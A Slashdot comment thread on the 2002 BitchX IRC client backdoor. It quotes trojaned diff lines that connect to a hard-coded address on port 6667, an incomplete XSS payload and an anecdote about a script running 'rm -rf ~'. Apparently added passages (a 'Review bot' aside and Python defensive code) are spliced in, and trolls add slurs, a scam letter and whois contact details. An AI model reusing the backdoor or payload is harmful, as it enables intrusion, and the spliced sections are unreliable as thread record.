
338 comments

FP! (-1)

govtcheez (524087) | more than 11 years ago | (#3806922)

I claim this first post in the name of Yoko Ono! May she die a fiery, horrible death!

Re:FP! (-1)

Adolf Hitroll (562418) | more than 11 years ago | (#3806925)

who's that ?
sounds like "yogurt grunge" !

Re:FP! (-1, Troll)

sinserve (455889) | more than 11 years ago | (#3806982)

That is the chick who used to fuck John Lennon, the first Beatle to bite the dust.

Re:FP! (-1)

Adolf Hitroll (562418) | more than 11 years ago | (#3807019)

lenon... bite... lemon...
sounds like some chicanos aperitive, to me...

so, there's a girl that fucked a hippie that bit the dust like freddie mercury ?

was it because of him, btw ?

Holy shit balls! (-1, Flamebait)

Anonymous Coward | more than 11 years ago | (#3806930)

a /. story about a backdoor not related to MS! I HAVE SEEN IT ALL!

haha (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#3806931)

That's a bitch

In other news ... (4, Funny)

NASAKnight (588155) | more than 11 years ago | (#3806938)

Local inmates confirmed that there was a problem with people entering into BitchX's backdoor. The suspect is a large man calling himself 'big mamma.'

Re:In other news ... (-1, Troll)

Anonymous Coward | more than 11 years ago | (#3807175)

BitchX - "We have a larger backdoor than goatse"

Fist "Bitch takes it up the back door" Post (-1, Troll)

Anonymous Coward | more than 11 years ago | (#3806940)

Well it had

to

be done...

...

XSS in Slashcode (-1, Offtopic)

dave-fu (86011) | more than 11 years ago | (#3806941)

There is a nasty Cross Site Scripting (XSS) vuln in Slashcode. This was used a day or so ago on slashdot.org and resulted in most of the site being taken down for an hour or so. The maintainers of slashcode have patched the problem in CVS but have not even mentioned it anywhere that I can find. This leaves all sites using slash vulnerable to this exploit.

An example exploit (incomplete) is as follows:

I am disappointed that the slashcode maintainers have silently fixed this on slashdot.org yet made no mention of the problem elsewhere so that other sites can patch themselves. No wonder there are so many "trolls" on slashdot.org... ah well.

If you run a site using slashcode, get the latest CVS.

That is all. Move along.

Re:XSS in Slashcode (-1)

neal n bob (531011) | more than 11 years ago | (#3806963)

those worthless fags can barely run a site, what do they care about securing other slash pages.

BTW - that exploit was possibly the best in slashbot history. I was proud to be a crapflooder that day.

Re:XSS in Slashcode (4, Interesting)

Jester998 (156179) | more than 11 years ago | (#3807000)

Hey... nice "copy and paste" from the BugTraq posting...
----- BEGIN BugTraq POST -----

Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31935 invoked from network); 2 Jul 2002 08:55:04 -0000
Message-ID: <20020702085626.305.qmail@web21002.mail.yahoo.com>
Date: Tue, 2 Jul 2002 01:56:26 -0700 (PDT)
From: gcsb <gcsbnz@yahoo.com>
Subject: XSS in Slashcode
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-UIDL: "[K!!WR\"!nkN"!NSF"!

There is a nasty Cross Site Scripting (XSS) vuln in Slashcode. This was used a day or so ago on slashdot.org and resulted in most of the site being taken down for an hour or so. The maintainers of slashcode have patched the problem in CVS but have not even mentioned it anywhere that I can find. This leaves all sites using slash vulnerable to this exploit.

An example exploit (incomplete) is as follows:

<p &gt; onMouseOver..insert javascript here...>

I am disappointed that the slashcode maintainers have silently fixed this on slashdot.org yet made no mention of the problem elsewhere so that other sites can patch themselves. No wonder there are so many "trolls" on slashdot.org... ah well.

If you run a site using slashcode, get the latest CVS.

That is all. Move along.

__________________________________________________
Do You Yahoo!?
Sign up for SBC Yahoo! Dial - First Month Free
http://sbc.yahoo.com

----- END BugTraq POSTING -----

You didn't even reformat the exploit code so that it showed up properly... sheesh.

- Jester
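The attribute-injection pattern quoted in the BugTraq post above is exactly what a tag allowlist has to neutralise. The sanitizer below is an added example, not Slashcode's own filter and not the fix its maintainers committed: it parses the comment with Python's html.parser, re-emits only an assumed allowlist of formatting tags with every attribute dropped, and escapes all text on the way out, so neither the onMouseOver attribute nor the stray &gt; inside the tag survives. The tag list and the sample inputs are assumptions for the demonstration.

```python
from html import escape
from html.parser import HTMLParser

# Assumed allowlist for the demonstration: formatting tags only, nothing
# that carries a URL or script. Attributes are never re-emitted.
ALLOWED_TAGS = frozenset({"p", "b", "i", "em", "strong", "blockquote", "br"})
VOID_TAGS = frozenset({"br"})


class AllowlistSanitizer(HTMLParser):
    """Rebuild a comment from parsed tokens instead of regex-filtering the
    raw string, so oddities such as an &gt; inside a tag, or an attribute
    that only becomes dangerous after entity decoding, never reach output."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []

    def handle_starttag(self, tag, attrs):
        # attrs (onmouseover=..., onclick=..., src=...) are discarded for
        # every tag; disallowed tags vanish but their inner text is kept.
        if tag in ALLOWED_TAGS:
            self.parts.append(f"<{tag}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is always escaped on the way out, whatever it looked like
        # coming in (convert_charrefs decoded entities before this point).
        self.parts.append(escape(data, quote=True))


def sanitize(fragment: str) -> str:
    """Return the comment with only allowlisted, attribute-free tags left."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.parts)


if __name__ == "__main__":
    # Constructed inputs shaped like the pattern in the thread.
    for sample in ("<p &gt; onMouseOver=alert(1)>hi</p>",
                   '<b onclick="x()">bold</b> & <i>it</i>',
                   "a <img src=x onerror=alert(1)> b"):
        print(repr(sample), "->", repr(sanitize(sample)))
```

Parse-and-rebuild is the design point: a filter that tries to recognise bad substrings in the raw text has to anticipate every encoding trick, whereas re-emitting from a parse tree only has to decide which tags are allowed. If links must be permitted, the href value needs its own allowlist of schemes before it is re-emitted.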

Re:XSS in Slashcode (4, Informative)

jamie (78724) | more than 11 years ago | (#3807153)

This post is quite inaccurate and we will be responding, also on bugtraq, momentarily. The author of the post did not contact the Slash development team, or we could have corrected some of his misconceptions.

Re:XSS in Slashcode (3, Insightful)

Pave Low (566880) | more than 11 years ago | (#3807033)

Interesting how there's a fairly serious bug in slashcode that was exploited yesterday but they don't publicize that. At least they fixed it quickly, but if you guys like to point out other peoples bugs, how about shining the light on yourself once in awhile? I'm sure other slashcode sites would have liked to have known about it.

IRC (-1)

Adolf Hitroll (562418) | more than 11 years ago | (#3806946)

IRC is just another form of parasitism.
there's nothing as boring as chat; I think if you have some time to lose, you'd better jerk off, at least you won't eat the bandwidth.
so yeah, who fscking cares about chat kiddies impersonating l33t h4x0rs in order to get some goatse pr0n ?
better go on slashdot... well... before Y2K.

The name.... (3, Interesting)

wowbagger (69688) | more than 11 years ago | (#3806947)

Am I the only one who felt a qualm about using this package because of the name?

BitchX - "I 0NZ0R J00, B1TCH!"

Re:The name.... (3, Informative)

RealisticWeb.com (557454) | more than 11 years ago | (#3806993)

You're not alone by far. My computer (yes even my Linux box) is a family computer, and I refuse to use any software with names or content that is not appropriate for my children to see. Keep in mind that what is "appropriate" is totally my opinion, and some people would argue with me, but my question is: why is this only ever an issue with open source software?

Re:The name.... (-1)

neal n bob (531011) | more than 11 years ago | (#3807011)

the answer to your question is that most of the open sores freaks are inspired by japanese tentacle porn; many of them are also known pedophiles. If they spent more time in real life and less whacking it to sailor moon or hello kitty then they would have normal names for their programs.

Re:The name.... (3, Insightful)

dalassa (204012) | more than 11 years ago | (#3807028)

Because most companies have marketing people to hit them on the head and say no, this is not appropriate.

Re:The name.... (1)

Lion-O (81320) | more than 11 years ago | (#3807034)

but my question is: why is this only ever an issue with open source software?

Because the people programming it don't have to worry about market sales and/or popularity ratings?

Re:The name.... (1)

jpc (33615) | more than 11 years ago | (#3807054)

Unfortunately, at least in this part of the world, mingetty really is rather rude if you parse it right (ie wrong). And it is rather widespread in Linux distros.

It is of course true that the less appropriate words haven't been trademarked yet, so they are available for open source projects.

How long... (0)

rmezzari (245108) | more than 11 years ago | (#3806957)

Will it take to find such backdoor if this software was closed-source?

That's one of the best arguments pro-open-source IMHO.

Re:How long... (0)

Anonymous Coward | more than 11 years ago | (#3807014)

Oh man. You are either a huge troll or a karma whore. I am not sure which. When a Microsoft bug is discovered you probably post how that would never happen in Open-Source.

Re:How long... (3, Insightful)

Anonymous Coward | more than 11 years ago | (#3807027)

About 5 seconds into install, when the closed-source firewall running on the closed-source OS catches the closed-source IRC client trying to create the reverse telnet connection.

Most interesting... (5, Interesting)

phreak404 (241139) | more than 11 years ago | (#3806961)

Is that when the vulnerability was first submitted they also submitted some interesting finds about the ftp server on BitchX.com serving trojaned and clean versions, depending on the originating IP, demonstrating that the server had been 0wned (more than likely).

Sad that the developers didn't notice sooner, and it makes you wonder how many boxes have now additionally been 0wned because of this.

Re:Most interesting... (-1)

neal n bob (531011) | more than 11 years ago | (#3806992)

typical of open sores developers - since it is well known that most open sores people are GNU/terrorists. It is likely they intended this to allow them to attack the US computer infrastructure. Thankfully most wise companies here have resisted the insecure, terror minded open sores software infiltration.

SENATOR BENSON OGBEBOR (-1)

trollercoaster (250101) | more than 11 years ago | (#3806962)

My name is SENATOR BENSON OGBEBOR, the executive chairman Pension funds committee in the senate of the federal Republic Of Nigeria. I am writing you to earnestly solicit for your assistance in helping to receive some sum of money. I got your e-mail address on the Internet while searching for a reliable and reputable person to handle this transaction.

THE PREPOSITION:
We have the sum of US$15,000,000.00 (Fifteen Million Dollars) that we intend to transfer overseas through the assistance of a foreign partner. This money came as a result of the unclaimed pension funds over the years due to the over invoiced claim put forward by my committee but the pensioners have already been paid for their claim. What is left is the over invoice amount of US$15,000,000.00 which has been deposited in a Bank.

I have agreed to transfer the funds overseas for my campaign funding and also invest part of this money in any viable business in your country under your care.

I am contacting you therefore, to stand in as the beneficiary to process this fund into your custody. I will provide you with 25% for assisting us and 5% for expenses.

The fund shall be transferred to you legally in accordance to all laid down procedures governing transfer of funds. I have perfected all modalities for the successful transfer of this money to you as the beneficiary. Finally, I have to reassure you that this transaction is risk free and should be kept absolutely confidential.

Presently, you can reach me by return mail, you should also include your telephone, fax and or phone numbers, for secured communication between us.

Thank you for your anticipated cooperation.

I await your response.

SENATOR BENSON OGBEBOR

Who's this? (5, Informative)

Draoi (99421) | more than 11 years ago | (#3806966)

There's an interesting IP address hard-coded into the trojaned code;

+ sa.sin_port = htons (6667);
+ sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);
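Review bot: the destination in these two lines is entirely literal, inet_addr ("213.77.115.17") plus htons (6667), so no DNS lookup is ever made and the only way the code can reach its listener is that exact address and port; an egress filter or connection log keyed on that pair sees the build phone home the moment it tries. The alarm (10) tucked onto the end of the second line arms a SIGALRM ten seconds later, which cuts a blocking connect short when the address is unreachable instead of leaving the process hanging, and two statements crammed onto one line in a networking change is itself the kind of thing a reviewer should read twice before merging.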
Doing a reverse-DNS lookup gives;
;; QUERY SECTION:
;; 17.115.77.213.in-addr.arpa, type = ANY, class = IN

;; ANSWER SECTION:
17.115.77.213.in-addr.arpa. 1H IN PTR wenus.dtcomsa.com.
.... so who are they??
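A defender can turn the two hard-coded values above into a detection. The following is an added example, not code from the thread or from BitchX, that scans a constructed key=value connection log for outbound connects to 213.77.115.17:6667 and, more generally, for port 6667 being opened by a process that is not an IRC client, the situation an AC above describes where a firewall catches the reverse connection as it is attempted. The log format, the process names, the allowlist of IRC clients and the sample lines are assumptions; the non-indicator addresses are from documentation ranges.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Indicator from the trojaned code: the literal address and port it connects to.
IOC_ADDR = "213.77.115.17"
IOC_PORT = 6667

# Assumed for this example: processes expected to open IRC connections on a
# workstation. Anything else reaching port 6667 gets flagged.
IRC_CLIENTS = frozenset({"BitchX", "irssi", "xchat"})

# Constructed sample lines in an assumed key=value connection-log format
# (not the output of any real firewall or audit daemon).
SAMPLE_LOG = """\
ts=2002-07-01T22:10:03 host=ws1 proc=BitchX dst=203.0.113.5 dport=6667 action=connect
ts=2002-07-01T22:11:47 host=ws2 proc=configure dst=213.77.115.17 dport=6667 action=connect
ts=2002-07-01T22:12:01 host=ws3 proc=wget dst=198.51.100.7 dport=21 action=connect
ts=2002-07-01T22:13:15 host=ws4 proc=BitchX dst=213.77.115.17 dport=6667 action=connect
ts=2002-07-01T22:14:30 host=ws5 proc=make dst=198.51.100.9 dport=6667 action=connect
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


@dataclass
class Alert:
    host: str
    proc: str
    dst: str
    dport: int
    reason: str


def parse_line(line: str) -> dict:
    """Split one key=value log line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def classify(rec: dict) -> Optional[str]:
    """Return why a connection record is suspicious, or None if it is not."""
    dst, dport, proc = rec["dst"], int(rec["dport"]), rec["proc"]
    if dst == IOC_ADDR and dport == IOC_PORT:
        # Matches regardless of process name: a trojaned BitchX binary would
        # show up as BitchX and still be talking to the wrong place.
        return "outbound connect to the address hard-coded in the trojaned BitchX"
    if dport == IOC_PORT and proc not in IRC_CLIENTS:
        # Per the thread the backdoor is wired into the build, so the
        # reverse connection comes from configure/make, not an IRC session.
        return "IRC port opened by a non-IRC process"
    return None


def scan_log(text: str) -> list:
    """Run every non-empty line through classify() and collect the alerts."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        reason = classify(rec)
        if reason is not None:
            alerts.append(Alert(rec["host"], rec["proc"], rec["dst"],
                                int(rec["dport"]), reason))
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a.host}: {a.proc} -> {a.dst}:{a.dport} ({a.reason})")
```

The two rules deliberately differ in lifetime: the address match is a throwaway indicator that stops mattering once the compromised host at 213.77.115.17 is cleaned up, while the process-versus-port rule keeps working against the next build-time backdoor that picks a different listener.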

Re:Who's this? (2)

larien (5608) | more than 11 years ago | (#3806981)

Probably the owners of another rooted box...

Re:Who's this? (2)

Draoi (99421) | more than 11 years ago | (#3807029)

True. At least it's a start - shutdown whatever's collecting data on port 6667 on the 0wn3d box & it'll stop the snoop ....

Re:Who's this? (4, Informative)

zdzichu (100333) | more than 11 years ago | (#3807001)

inetnum 213.77.115.0 - 213.77.115.255
netname DATACOM
descr Datacom
descr Warszawa Bemowo
country PL
admin-c AW7760-RIPE
tech-c RW7118-RIPE
status ASSIGNED PA
mnt-by AS5617-MNT
changed tkielb@cst.tpsa.pl 20000915
source RIPE

(stupidly formatted because of lamefilter)

Re:Who's this? (0, Redundant)

jhampson (580482) | more than 11 years ago | (#3807013)

Ack! is the .pl the domain for Palestine? The Feds are right, we ARE being cyber-attacked!

Re:Who's this? (0, Flamebait)

Ilgaz (86384) | more than 11 years ago | (#3807025)

.pl=Poland
.pk=Palestine (err, imagining dozens of arab terrorists in front of some *nix boxes makes me laugh)

Re:Who's this? (1)

Ilgaz (86384) | more than 11 years ago | (#3807044)

Whats that with that p* domain..? eek, .pk is Pakistan. Sorry

Re:Who's this? (1)

hyperstation (185147) | more than 11 years ago | (#3807146)

god, palestine is .ps you jackasses...i think we all need to look at the ccTLD list [slashdot.org] again.

Re:Who's this? (0)

Anonymous Coward | more than 11 years ago | (#3807031)

It's Poland (oh surprise, hackers from East Europe), not Palestine... the Palestinians don't even have a recognized state (yet at least) and of course don't have their own domain.

Re:Who's this? (5, Informative)

Neil Watson (60859) | more than 11 years ago | (#3807038)

PL is Poland.

[nwatson@valetta ~]$whois 213.77.115.17
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum: 213.77.115.0 - 213.77.115.255
netname: DATACOM
descr: Datacom
descr: Warszawa Bemowo
country: PL
admin-c: AW7760-RIPE
tech-c: RW7118-RIPE
status: ASSIGNED PA
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

route: 213.77.0.0/16
descr: TPNET (PL)
descr: Provider Local Registry
origin: AS5617
notify: konradpl@zt.piotrkow.tpsa.pl
mnt-by: AS5617-MNT
changed: konradpl@zt.piotrkow.tpsa.pl 20000728
source: RIPE

person: Arkadiusz Wrobel
address: "DataCOM" S. A.
address: ul Radiowa 21a m20
address: 01 - 485 Warszawa
address: POLAND
phone: +48 606 298639
fax-no: +48 22 6672495
e-mail: awrobel@wat.waw.pl
nic-hdl: AW7760-RIPE
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

person: Rafal Wrzosek
address: "DataCOM" S. A.
address: ul Kaliskiego 11a /312
address: 01 - 485 Warszawa
address: POLAND
phone: +48 606 145187
fax-no: +48 22 6672495
e-mail: awrobel@wat.waw.pl
nic-hdl: RW7118-RIPE
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

Yes, someone has most likely compromised the box and is using it for the backdoor. However, the owners of the box are still responsible for the lack of security that allowed their box to be compromised.

Re:Who's this? (0, Troll)

Basje (26968) | more than 11 years ago | (#3807152)

However, the owners of the box are still responsible for the lack of security that allowed their box to be compromised.

I disagree. That would be equivalent to saying you are responsible for your house being burgled. Not having (adequate) security makes one a likely target. It does not, however, make you responsible.

They are, of course, responsible for anything they do. Giving out backdoored software might get them in trouble, if they actively sent the software to people. If people downloaded it, they may be liable. However, not many countries have as "modern" laws as the USofA; I do not think that is a problem in Poland.

Re:Who's this? (1, Informative)

Anonymous Coward | more than 11 years ago | (#3807008)

It's hardly likely to be the owners of that machine that wrote the backdoor. That IP is likely to be somebody else's machine that's been compromised and used by the backdoor creators.

Re:Who's this? (0, Redundant)

Ark42 (522144) | more than 11 years ago | (#3807020)

According to http://www.iana.org/assignments/ipv4-address-space Its a RIPE IP, and according to http://www.ripe.net/perl/whois/

inetnum: 213.77.115.0 - 213.77.115.255
netname: DATACOM
descr: Datacom
descr: Warszawa Bemowo
country: PL
admin-c: AW7760-RIPE
tech-c: RW7118-RIPE
status: ASSIGNED PA
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

route: 213.77.0.0/16
descr: TPNET (PL)
descr: Provider Local Registry
origin: AS5617
notify: konradpl@zt.piotrkow.tpsa.pl
mnt-by: AS5617-MNT
changed: konradpl@zt.piotrkow.tpsa.pl 20000728
source: RIPE

person: Arkadiusz Wrobel
address: "DataCOM" S. A.
address: ul Radiowa 21a m20
address: 01 - 485 Warszawa
address: POLAND
phone: +48 606 298639
fax-no: +48 22 6672495
e-mail: awrobel@wat.waw.pl
nic-hdl: AW7760-RIPE
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

person: Rafal Wrzosek
address: "DataCOM" S. A.
address: ul Kaliskiego 11a /312
address: 01 - 485 Warszawa
address: POLAND
phone: +48 606 145187
fax-no: +48 22 6672495
e-mail: awrobel@wat.waw.pl
nic-hdl: RW7118-RIPE
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

Re:Who's this? (0, Redundant)

andyr (78903) | more than 11 years ago | (#3807024)

% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum: 213.77.115.0 - 213.77.115.255
descr: Datacom
descr: Warszawa Bemowo
country: PL
admin-c: AW7760-RIPE
tech-c: RW7118-RIPE
status: ASSIGNED PA
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

Re:Who's this? (1)

bokketies (584972) | more than 11 years ago | (#3807118)

so who are they??

After careful investigation which involved numerous traceroutes and pings I can now conclude this isn't a group of persons. So you're wrong there, it's not a "they" but a "she".

She is a bitch.

Does anyone still use Pirch ? (1, Offtopic)

cOdEgUru (181536) | more than 11 years ago | (#3806968)

When I first started using irc clients, mirc and Pirch were my first two clients. I understand mirc is one of the most widely used clients, but what about Pirch? Does anyone still use it.

Re:Does anyone still use Pirch ? (1)

Ilgaz (86384) | more than 11 years ago | (#3807074)

Sad, it's gone for good... I liked it too! If you want a Pirch like IRC client for win32 box, you probably have heard of x-chat of *nix, now it has unofficial win32 port hosted on its official website ( http://www.xchat.org )

Re:Does anyone still use Pirch ? (1)

cetan (61150) | more than 11 years ago | (#3807178)

Heh, I've still got it installed but I shell for IRC and use irssi. It's there if I need it but I've not touched it in ages.

It's Odd (3, Interesting)

Copperhead (187748) | more than 11 years ago | (#3806969)

According to the bugtraq post, when you downloaded the file, sometimes you received the backdoored version, and other times you didn't.

From the post, "There is something very strange going on with the FTP server on ftp.bitchx.org. In some cases, it serves up the trojaned version; in others, the original, safe version. It seems to be client / client-behavior based (we're not sure exactly what)."

The post continues, "To add a little more to this; we've confirmed that if you come off of what appears to be a cablemodem/dsl IP you are likely to get a trojan'd copy. If you come off of a more static link, you are likely to get a clean copy."

Very strange.

Re:It's Odd (2)

dattaway (3088) | more than 11 years ago | (#3807043)

I'm on a cablemodem and I tried getting the trojaned version hours after this was discovered. Apparently, the ftp server was fixed as I tried from multiple IP addresses and ways... Fortunately, I happened to have the tarball that I compiled from and the md5sum matched the good version.

Moral of the story: *always* check md5sums, or use a packaging system that always checks it for you. Doesn't rpm automatically do this? Gentoo's portage does.

Re:It's Odd (1)

Quietust (205670) | more than 11 years ago | (#3807066)

What I'd like to know about MD5 sums is what prevents the h4x0r from updating the MD5 sum on the FTP server to match the trojan'd download.

Unless the MD5s stored up there are also digitally signed (i.e. PGP/GPG/etc.), which would be rather redundant (since it'd be easier to just sign the archive itself).

Re:It's Odd (2)

ceswiedler (165311) | more than 11 years ago | (#3807077)

If the ftp server was rooted, why couldn't they just replace the md5 sums? Usually I see them as files in the same directory as the tarballs. How hard is it to generate an md5 sum which matches the hacked version?
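The objection above, and the same one in dattaway's and Quietust's posts, comes down to where the checksum lives. The following added example, not from the thread or from any package manager, models it with constructed byte strings standing in for the clean and trojaned tarballs: a checksum file published on the same compromised server passes for the trojan, a digest that arrived out of band (a distribution's package metadata, or a maintainer's checksum the user recorded before the compromise) does not, and hashing two copies fetched from different vantage points catches the IP-dependent serving described earlier in the thread. MD5 is the default because that is what the thread discusses; the functions accept any hashlib algorithm name.

```python
import hashlib
import hmac

# Constructed stand-ins for the real archives (not BitchX's actual files).
CLEAN_TARBALL = b"constructed: clean source tree"
TROJANED_TARBALL = b"constructed: source tree + reverse-connect backdoor"


def digest_hex(data: bytes, algo: str = "md5") -> str:
    """Hex digest of a downloaded file. MD5 is what the thread used in 2002;
    any name hashlib knows (e.g. "sha256") works the same way."""
    return hashlib.new(algo, data).hexdigest()


# The checksum file sitting next to the tarball on the FTP server. Whoever
# replaced the tarball could rewrite this as well, so here it already
# matches the trojaned copy: it only proves the two were published together.
SAME_SERVER_CHECKSUM = digest_hex(TROJANED_TARBALL)

# A digest that reached the user over a channel the FTP server's attacker
# does not control: package-manager metadata, or a checksum the maintainer
# published and the user saved before the compromise.
OUT_OF_BAND_DIGEST = digest_hex(CLEAN_TARBALL)


def checksum_matches(data: bytes, expected_hex: str, algo: str = "md5") -> bool:
    """Constant-time comparison of the file's digest against an expected one."""
    return hmac.compare_digest(digest_hex(data, algo), expected_hex)


def verify_download(data: bytes, same_server_hex: str, trusted_hex: str) -> dict:
    """Report which of the two checks one downloaded copy passes."""
    return {
        "same_server_checksum": checksum_matches(data, same_server_hex),
        "out_of_band_digest": checksum_matches(data, trusted_hex),
    }


def copies_agree(*copies: bytes, algo: str = "md5") -> bool:
    """True when every copy hashes the same, e.g. one fetched from a
    cable-modem IP and one from a static link. A split result means the
    server is handing different files to different clients."""
    return len({digest_hex(c, algo) for c in copies}) == 1


if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_TARBALL), ("trojaned", TROJANED_TARBALL)):
        print(name, verify_download(blob, SAME_SERVER_CHECKSUM, OUT_OF_BAND_DIGEST))
    print("copies agree:", copies_agree(CLEAN_TARBALL, TROJANED_TARBALL))
```

The thing to notice is that the same-server checksum reports the trojaned copy as good and the clean copy as bad, which is the opposite of what the user wants; only the digest with an independent provenance separates the two. A detached signature over the archive, verified against a key obtained elsewhere, is the general form of that independent channel, which is why the thread's suggestion to sign the archive itself rather than the checksum file is the right one.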

Re:It's Odd (3, Insightful)

mindstrm (20013) | more than 11 years ago | (#3807086)

Well, perhaps they wanted to spread it to dumb home users but not to anyone more professional. Perhaps they wanted to go longer without being caught.

Perhaps it's actually a DNS issue, and it's directing some people to a dummy server.

Re:It's Odd (0)

Anonymous Coward | more than 11 years ago | (#3807045)

You added nothing whatsoever to the commentary except "Very Strange". Congrats on catching yet another moderator who doesn't read posts.

Re:It's Odd (1)

Ilgaz (86384) | more than 11 years ago | (#3807097)

Hmm... BX ftp DNS server hacked, so it rotates IPs to trojaned version carrying IP and real IP?

I am an end user but I guess it's possible. Just like aol.com rotates ftp.netscape.com to different machines, there is a software for it.

terminology (1, Funny)

Anonymous Coward | more than 11 years ago | (#3806970)

Not only is this thing called "BitchX", but it also has a "backdoor". I'm not a vulgar person, but this is too much

ah, the good ol' days (5, Funny)

MattW (97290) | more than 11 years ago | (#3806972)

This reminds me of the good old days, when people distributed like 20 different scripts for the irc2 client, all of which had some backdoor or another. Most of them listened for ctcp commands and would pass them directly to shell. CTCP GROK JUPE CMD ORD -- bonus points to anyone who can name all 4 scripts that had those backdoor commands. Then there were amusing tidbits like scripts that would flood anyone using the author's nick without the right hostmask. Then there was the 'Folger's Crystals' script -- it set your display to off, so you saw nothing even while you joined a channel and were saying, "I've just had all my files secretly replaced by folgers_crystals... let's see what happens!" (meanwhile, the script was executing rm -rf ~).

Of course, back then, you could blame people for running something they didn't understand, since it was on the order of getting a whack-a-bill game by email and just running it, whereas tainted downloads aren't quite as shameful, but ah, it does bring back the memories of the Wild Days of irc...

Re:ah, the good ol' days (1)

kistel (585461) | more than 11 years ago | (#3807133)

Oh well, those were the days... Most of the ppl used unchecked scripts, which was like a habit or something (Phoenix by Vassago, etc.) The famous bot wars, op wars, splits and floodings ;-)

indeed (2)

MattW (97290) | more than 11 years ago | (#3807165)

Ah, yes. But the best was just colliding people, pre-TS. I wrote a script that made connection(s) to remote servers, usually far from you and your intended victim. If they changed nicks (which people often did to avoid being collided by a split off server rejoining their nick), the script would order the remote client to change nicks. Since the direct connection would propagate faster than the server-server-server links (usually you'd pick a server 5+ hops away), by the time the nick change propagated there, it would cause a collision. Combine that with a traditional collide from a split server, and it was unavoidable. I remember taking #jews back from a bunch of nazis using that script.

Re:ah, the good ol' days (0)

Anonymous Coward | more than 11 years ago | (#3807190)

IRC wars cost universities big money and are the sole reason why IRC is turned off left and right. Funny how some people remember shitting in their own bed as "good ol' days".

Any text client do dccserver? (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#3806974)

I hate MIRC but want to use fservers behind firewalls. Anyone have a client with the /dccserver command supported?

See, this is what's cool about OSS.. (3, Insightful)

XaXXon (202882) | more than 11 years ago | (#3806977)

If BitchX was some sort of closed-source product, how long might this have taken to show up? Many eyes lock down all backdoors.

Anti-GPL people (read Microsoft and their lackeys) may try and take this as a weakness in OSS, but I look at it as a strength. If one of their developers gets something like this into one of their products (either on his/her own or with the blessing of the company), the world may never know. With OSS, it's out in the open for everyone to see/fix.

Re:See, this is what's cool about OSS.. (5, Insightful)

toupsie (88295) | more than 11 years ago | (#3807042)

If BitchX was some sort of closed-source product, how long might this have taken to show up? Many eyes lock down all backdoors.

Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor, modify the FTP server and set up a bizarre distribution method (has anyone figured this out yet?). Granted many eyes helped find this problem, but in a closed source world, this wouldn't happen unless you had a disgruntled employee or a really stupid project manager. If BitchX were a commercial, closed source product, the exploit would most likely be a buffer overflow, not a blatant backdoor.

Disclaimer: I use a closed source IRC product called, Ircle [ircle.com].

Re:See, this is what's cool about OSS.. (2)

Shagg (99693) | more than 11 years ago | (#3807063)

Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor

I guess the only backdoors in MS software are the ones the developers put there ;)

Re:See, this is what's cool about OSS.. (2)

toupsie (88295) | more than 11 years ago | (#3807089)

I guess the only backdoors in MS software are the ones the developers put there ;)

Exactly! Check out this post [slashdot.org] in the same thread. I mentioned exactly this problem!!!

Re:See, this is what's cool about OSS.. (0)

Anonymous Coward | more than 11 years ago | (#3807069)

uhh
and how many months did it take to get noticed?

Re:See, this is what's cool about OSS.. (2)

jmegq (33169) | more than 11 years ago | (#3807076)

> With OSS, it's out in the open for everyone to see/fix.

Not really. [acm.org]

Re:See, this is what's cool about OSS.. (1)

vegetablespork (575101) | more than 11 years ago | (#3807168)

Reflections on Trusting Trust was also exactly what came to my mind when I read about the apparent ftp server compromise also.

<speculation mode=conspiracy tone=sardonic>Closed source vendors are planting trojans in open source code to create high profile incidents causing the general public to question its security and rely on safe, regularly patched Microsoft Palladium products</speculation>

Re:See, this is what's cool about OSS.. (1)

protonman (411526) | more than 11 years ago | (#3807179)

Ok. That does it. I'll modify my filters so I can read just the trolls. Hmm, this probably is a troll anyway.

tss... insightful my ass...

Not as bad as the massive backdoor in Windows (1, Offtopic)

toupsie (88295) | more than 11 years ago | (#3806980)

As reported in The Register [theregister.co.uk]. Why worry about IRC when Microsoft 0w3n$ j00!...legally...24/7.

*BSD Is Dying (-1)

pwpbot (588025) | more than 11 years ago | (#3806983)

